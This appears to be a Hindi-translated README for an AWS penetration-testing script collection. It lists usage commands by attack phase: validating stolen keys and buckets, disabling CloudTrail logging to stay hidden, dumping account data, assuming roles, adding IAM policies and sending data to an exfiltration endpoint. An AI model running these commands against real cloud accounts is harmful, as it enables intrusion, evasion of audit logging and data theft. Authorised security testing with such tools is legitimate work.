
AWS पैठ परीक्षण सामग्री का संग्रह
यह AWS पेनिट्रेशन टेस्टिंग से संबंधित विभिन्न कार्यों को करने के लिए भयानक रूप से लिखे गए स्क्रिप्ट का संग्रह है। कृपया दुखी न हों यदि यह आपके लिए काम नहीं करता है। हो सकता है कि AWS बदल गया हो जबसे कोई टूल लिखा गया था या हो सकता है कि कोड खराब हो। किसी भी तरह, कृपया योगदान करने के लिए स्वतंत्र महसूस करें।
इस अधिकांश बकवास को Daniel Grzelak ने लिखा था लेकिन इसमें बहुत सारे योगदान हुए हैं, विशेष रूप से Mike Fuller का।
pip install -r requirements.txt
यह भी सुनिश्चित करें कि आपने ~/.aws/credentials में अपने AWS क्रेडेंशियल्स सेट अप किए हों।
समझौता-पूर्व सूचना संग्रह से संबंधित कार्य।
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json
ऐसी चीज़ें जो खाते में पैर जमाने में आपकी मदद करेंगी।
ऐसी चीज़ें जो खाते से समझौता करने के बाद छिपे रहने में आपकी मदद कर सकती हैं।
./disrupt_cloudtrail.py -s
ऐसी चीज़ें जो यह समझने में आपकी मदद करती हैं कि आपने क्या हैक किया है।
./dump_account_data.sh /tmp/
ऐसी चीज़ें जो खाते में घूमने और एक्सेस के विभिन्न स्तरों को इकट्ठा करने में आपकी मदद करती हैं।
./dump_instance_attributes.py -u -o /tmp/
./dump_cloudformation_stack_descriptions.py -o /tmp/data
./assume_roles.py -o /tmp/out.json
./add_iam_policy.py -u myuser -r myrole -g mygroup
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint
ऐसी चीज़ें जो खाते तक आपकी पहुँच बनाए रखने में मदद करती हैं।
ऐसी चीज़ें जो AWS तरीकों से डेटा निकालने और स्थानांतरित करने में आपकी मदद करती हैं।
अन्य चीज़ें जिन्हें वर्गीकृत करने के लिए मैं या तो मूर्ख था या बहुत आलसी।